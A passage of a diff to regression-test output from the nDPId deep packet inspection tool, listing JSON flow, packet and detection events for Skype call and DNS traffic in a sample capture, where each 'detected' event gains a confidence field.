 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1149,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1431970677974,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1431970677974,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyXBgAAEARPQLAqAEinTeCnzLdnFAAHlQNe6UCbRCk9Zm0qay7l4LGg8ZPRvGp2A=="}
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.159","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.159","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1150,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.170","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1150,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1431970677974,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970677974,"pkt":"0NQSxnP1PBXCt3IOCABFAABATykAAEARrDLAqAEib91NqjLdnFUALAKIe6cC06nLoifBCja4NtBTBPAIMkjY1r+eVyo0K906xL\/RnajP"}
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1150,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.170","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1150,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.170","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 01126{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1161,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1431970678945,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"ts_msec":1431970678945,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAISqNoAAEARDjfAqAEi\/\/\/\/\/0RcRFwB\/vqceyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="}
 01122{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1162,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1431970678946,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"ts_msec":1431970678946,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAISZSMAAEARj0bAqAEiwKgB\/0RcRFwB\/jf1eyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1164,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1164,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1431970678985,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431970678985,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/p1UAAEAR8T7AqAEiQTffGDLdnF0AK+jLe6kC6fGNK2goAXsNse6RdApll6kRm4bOwgAP2hC\/D2eOAyk="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1164,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1164,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1165,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1165,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1431970678985,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1431970678985,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7GMMAAEARF0\/AqAEinTfrnjLdnFsAJ5Hde6sCJ8R84KyvegILw5PDMDyyzP0qbIKzwXJl3e6CLA=="}
-00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1165,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1165,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1166,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1166,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1431970678985,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431970678985,"pkt":"0NQSxnP1PBXCt3IOCABFAAA49SsAAEARo3fAqAEiQTffEDLdnGAAJBSJe60CT4+h0ZiCfQwqP7NMcZ5acjfF0jfx+oM28A=="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1166,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1166,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970678985,"flow_last_seen":1431970678985,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970678985,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 01126{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1167,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1431970679027,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"ts_msec":1431970679027,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISpvoAAEARD93AqAFc\/\/\/\/\/0RcRFwB\/v9VeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="}
 01122{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1168,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1431970679028,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"ts_msec":1431970679028,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISy7gAAEARKHfAqAFcwKgB\/0RcRFwB\/jyueyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1179,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679839,"flow_last_seen":1431970679839,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431970679839,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60413,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1179,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1431970679839,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"ts_msec":1431970679839,"pkt":"0NQSxnP1PBXCt3IOCABFAABK0kgAAEARJOfAqAEiwKgBAev9ADUANqf\/XW0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDABcgVza3lwZQNuZXQAAAEAAQ=="}
-00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1179,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679839,"flow_last_seen":1431970679839,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431970679839,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60413,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst0.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1179,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679839,"flow_last_seen":1431970679839,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431970679839,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60413,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst0.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1180,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679839,"flow_last_seen":1431970679839,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431970679839,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64364,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1180,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1431970679839,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"ts_msec":1431970679839,"pkt":"0NQSxnP1PBXCt3IOCABFAABKzS8AAEARKgDAqAEiwKgBAftsADUANoJ0c24BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDABcgVza3lwZQNuZXQAABwAAQ=="}
-00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1180,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679839,"flow_last_seen":1431970679839,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431970679839,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64364,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst0.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1180,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679839,"flow_last_seen":1431970679839,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431970679839,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64364,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst0.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1182,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970679995,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1182,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1431970679995,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1431970679995,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7shQAAEARfXbAqAEi1cezlTLdnF4AJ7D1e68CWBP9byLKqG9T\/ZSkhpqmfvjcm+3DFpOZwv2yxQ=="}
-00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1182,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970679995,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1182,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970679995,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1183,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970679995,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
